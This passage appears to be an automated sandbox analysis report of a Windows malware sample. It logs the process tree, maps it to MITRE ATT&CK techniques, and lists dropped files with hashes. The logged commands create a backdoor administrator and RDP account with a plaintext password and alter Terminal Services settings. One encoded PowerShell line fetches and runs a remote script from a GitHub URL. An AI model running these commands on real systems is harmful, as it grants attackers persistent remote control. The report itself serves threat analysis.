    - Server Software Component: Terminal Services DLL
    - Modifies registry key
    PID:3452
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:1452
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4516
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:1804
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1692
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1768
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1944
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:4704
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3012
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1868
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:400
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:4332
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:2044
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:4412

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Indicator Removal: Network Share Connection Removal
- Suspicious use of WriteProcessMemory
PID:412
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Indicator Removal: Network Share Connection Removal
  - Suspicious use of WriteProcessMemory
  PID:2524
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    - Indicator Removal: Network Share Connection Removal
    PID:4360

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc 8JA3EdVW /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4868
- C:\Windows\system32\net.exe
  net.exe user wgautilacc 8JA3EdVW /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc 8JA3EdVW /add
    3⤵
    PID:2888

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
- Suspicious use of WriteProcessMemory
PID:1748
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:2468
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:2104

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" SPDEBJWH$ /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:3848
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" SPDEBJWH$ /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:800
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" SPDEBJWH$ /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:4064

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:3748
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  PID:2064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:2956

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc 8JA3EdVW
1⤵
PID:2476
- C:\Windows\system32\net.exe
  net.exe user wgautilacc 8JA3EdVW
  2⤵
  PID:1320
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc 8JA3EdVW
    3⤵
    PID:4208

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:1384
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:5012

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:3992
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1524

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:4732
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2jugl4gk\2jugl4gk.dll

Filesize
3KB

MD5
6a18e12aa964f9d71417aa0977ef6fec

SHA1
fc9901e8ffed74ba223729518be15a6f40988a51

SHA256
15692fc4948448e6eb070ecccb74361d78403b8805112c161e242d3db794d7b9

SHA512
20375528ff132ad33bc0eeb8392060212ad5036b7f283065a99770c0c5ab15d26a6c2d6ebadfecf3f7de7c13628272301c9235d979996f9c017d93820eec4040

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESAC5D.tmp

Filesize
1KB

MD5
b7ed30d833423788e29b383e4bcc1c27

SHA1
059669c0a0bea02abe22cb9d416675169e7c4a1c

SHA256
d8f5452e65d6c54870abb5ff7d4458c6babdf6ba3b7d25aac582d5bbd4dbd14b

SHA512
d84f313179475181a3b89a618e5d719858e1d744765e78553090b0cb952c70fec0e0d489ed71311cea7ccc4639e9157d0f87d16a02281e79ad1eec6d860dab48

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_snk1onrw.lpp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
c4bcb62d200b6aa544ed9e5b3399c975

SHA1
7808d467e453b9a8de354af3dab0d10c3e32bee0

SHA256
bd62d13d4264bbd68697866bb1975e7f2fa0b591d71a67856c9a5e7b081beba7

SHA512
87005bc71aa53c5a880d5401378d024033dd0401f267119be02a2d991258becc95916313a55bbe359ec39325593e17b87af02a30cbed2c82672ccea2ac0af745

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
f90a95e65ea4b8785701c5016a5319e3

SHA1
998ff9ca14eecdee37352a362c5929e6ecadf543

SHA256
83e90a20670525dcd14b387165d04c86fd88719b9aa55936318cb5c2a30ef003

SHA512
2ffb491306538032143623a4ea38d0adbe031550ae9e3e973d5e7b48c5737aecab4b92f9d3e50c07e1b70f0e3e1a3b8bc499c6c8d4ff1984ba3971357e1c8578

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
c88ee22ef943b6984da0a92dcbdbb512

SHA1
fe6be3ebdc42c32d5a5842fd34d61c6b217e7454

SHA256
8697ec4ec5cde1fea30fe0f5ccd3e97ef9fafbb392ac0b4404d012a4fc1afa1d

SHA512
108ffb89411d1c0db5ef90d056d91187771ec0103adaa4a97904cb4fd25473208dd4fddc0f6cbba646f21a5d164a5a93c80c989211ceabed863196a4afc319c6

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGID2C1.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2jugl4gk\2jugl4gk.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2jugl4gk\2jugl4gk.cmdline

Filesize
369B

MD5
d0a83d242b3bfe7633d9acd22da3bbda

SHA1
751a2f1f23ce53aea1c83a0e039b9e2287636ef5

SHA256
b3aa914f80280a6642416cabe2c90e691d7cac8c31011f3256297741b5c21f67

SHA512
2d4897456901bef18d07ecc575b67050d3e717c908b063430e5fada2191320d65df5e6573185820b751f6e555a671a2b2517d93071f31f310f00e4e001482682

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2jugl4gk\CSC4655CCF76F304B96BD91E02FDB701860.TMP

Filesize
652B

MD5
f5d9647dec7007be0e1a442962a1ecf3

SHA1
e2553f1e7870dc6f93a5638678ec13dde652249e

SHA256
b13b8eb209c92ad7e088642602087cf78be100a17f7e1209bf30c3a6d60830be

SHA512
c0a686c43963e533beb2ce4e8e5ba35cc6d304f5954b996a980854034a8a0df992e398ce9690338ea6bd2522f5e0a0729bd1e381bdd7f351040fa241df809313

Download Submit
memory/1460-19-0x0000021F63110000-0x0000021F63132000-memory.dmp

Filesize
136KB

Download
memory/1460-70-0x00007FF9154E0000-0x00007FF915FA1000-memory.dmp

Filesize
10.8MB

Download
memory/1460-20-0x00007FF9154E0000-0x00007FF915FA1000-memory.dmp

Filesize
10.8MB

Download
memory/1460-134-0x00007FF9154E0000-0x00007FF915FA1000-memory.dmp

Filesize
10.8MB

Download
memory/1460-18-0x00007FF9154E0000-0x00007FF915FA1000-memory.dmp

Filesize
10.8MB

Download
memory/1460-35-0x0000021F625A0000-0x0000021F625A8000-memory.dmp

Filesize
32KB

Download
memory/1460-8-0x00007FF9154E0000-0x00007FF915FA1000-memory.dmp

Filesize
10.8MB

Download
memory/1460-38-0x0000021F63530000-0x0000021F636A6000-memory.dmp

Filesize
1.5MB

Download
memory/1460-39-0x0000021F638C0000-0x0000021F63ACA000-memory.dmp

Filesize
2.0MB

Download
memory/1460-24-0x00007FF9154E0000-0x00007FF915FA1000-memory.dmp

Filesize
10.8MB

Download
memory/1460-98-0x00007FF9154E0000-0x00007FF915FA1000-memory.dmp

Filesize
10.8MB

Download
memory/1572-49-0x00007FF9154E3000-0x00007FF9154E5000-memory.dmp

Filesize
8KB

Download
memory/1572-5-0x00007FF9154E0000-0x00007FF915FA1000-memory.dmp

Filesize
10.8MB

Download
memory/1572-4-0x00007FF9154E0000-0x00007FF915FA1000-memory.dmp

Filesize
10.8MB

Download
memory/1572-3-0x00007FF9154E0000-0x00007FF915FA1000-memory.dmp

Filesize
10.8MB

Download
memory/1572-2-0x00007FF9154E0000-0x00007FF915FA1000-memory.dmp

Filesize
10.8MB

Download
memory/1572-50-0x00007FF9154E0000-0x00007FF915FA1000-memory.dmp

Filesize
10.8MB

Download
memory/1572-1-0x000001FD72820000-0x000001FD72C46000-memory.dmp

Filesize
4.1MB

Download
memory/1572-0-0x00007FF9154E3000-0x00007FF9154E5000-memory.dmp

Filesize
8KB

Download
memory/1572-136-0x00007FF9154E0000-0x00007FF915FA1000-memory.dmp

Filesize
10.8MB

Download